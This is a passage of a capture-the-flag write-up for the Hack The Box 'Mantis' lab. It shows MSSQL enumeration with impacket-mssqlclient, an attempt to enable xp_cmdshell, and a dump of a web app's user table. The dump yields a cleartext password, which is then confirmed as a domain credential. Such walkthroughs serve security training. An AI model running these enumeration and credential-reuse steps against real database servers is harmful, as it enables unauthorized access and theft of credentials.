MSSQL
Nmap enumerated that there is an instance of MSSQL on port 1433 and 50255
It’s Microsoft SQL Server 2014 12.00.2000
MSSQL absolutely requires a valid credential to enumerate.
Thankfully, a valid MSSQL credential was disclosed from a note found in the web server running on port 1337
impacket-mssqlclient
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-mssqlclient htb.local/admin:@$IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: @dm!n_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> The credential is VALIDATED.
I accidently forgot to supply the -d flag to indicate the database, orcharddb
I got connected to the master DB,
SQL> SELECT @@version;
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
Feb 20 2014 20:04:26
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
I first double-checked the version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
SQL> SELECT name FROM master..syslogins;
name
---------------------------------------------------------------------------------------------------
sa
admin
SELECT name FROM master..syslogins;
Listing users from themaster..syslogins table
SQL> enable_xp_cmdshell;
[-] ERROR(MANTIS\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(MANTIS\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
enable_xp_cmdshell;
The admin user does not have privilege to enable system shell
This indicates that the admin user is NOT a sysadmin
SQL> SELECT name FROM master..sysdatabases;
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
SELECT name FROM master..sysdatabases;
also listed the DBs available in the MSSQL server
Except for orcharddb, everything else is just the default MSSQL installation
SQL> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
--------------------------------------------------------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord
SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES;
I listed all the tables within the orcharddb DB
While there are a lot of tables, there are a few tables that stand out the most;
blog_Orchard_Users_UserPartRecordblog_Orchard_Roles_UserRolesPartRecordblog_Orchard_Blogs_BlogPartArchiveRecord
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Blogs_BlogPartArchiveRecord;
Id Year Month PostCount BlogPart_id
----------- ----------- ----------- ----------- -----------
1 2017 9 2 12
SELECT * from orcharddb.dbo.blog_Orchard_Blogs_BlogPartArchiveRecord;
The blog_Orchard_Blogs_BlogPartArchiveRecord table just reveals the status of the archive
it doesn’t have anything interesting
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Roles_UserRolesPartRecord;
Id UserId Role_id
----------- ----------- -----------
1 15 4
2 15 5
SELECT * from orcharddb.dbo.blog_Orchard_Roles_UserRolesPartRecord;
The blog_Orchard_Roles_UserRolesPartRecord table seems a bit more promising as this table is responsible for setting user privileges. I can see that it listed 2 users.
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Users_UserPartRecord;
Id UserName Email NormalizedUserName Password PasswordFormat HashAlgorithm PasswordSalt RegistrationStatus EmailStatus EmailChallengeToken CreatedUtc LastLoginUtc LastLogoutUtc
----------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------- ------------------- -------------------
2 admin admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== Hashed PBKDF2 UBwWF1CQCsaGc/P7jIR/kg== Approved Approved NULL 2017-09-01 13:44:01 2017-09-01 14:03:50 2017-09-01 14:06:31
15 James james@htb.local james J@m3s_P@ssW0rd! Plaintext Plaintext NA Approved Approved NULL 2017-09-01 13:45:44 NULL NULL
SELECT * from orcharddb.dbo.blog_Orchard_Users_UserPartRecord;
The blog_Orchard_Users_UserPartRecord table is the jackpot!
It contains the credential data for the 2 users, which include the current user; admin
The other one is the james user, and he has a CLEARTEXT password on the table
J@m3s_P@ssW0rd!
The james user was discovered during the username enumeration earlier
So it is HIGHLY possible that this is a domain user credential
I will validate the credential through impacket-mssqlclient once again with the -windows-auth flag, which uses the Windows NTLM authentication. This will confirm that the credential is a domain credential.
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-mssqlclient htb.local/james:@$IP -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: J@m3s_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
The credential is VALIDATED and confirmed to be a domain credential.
Now that I have a valid domain credential I do all kinds of things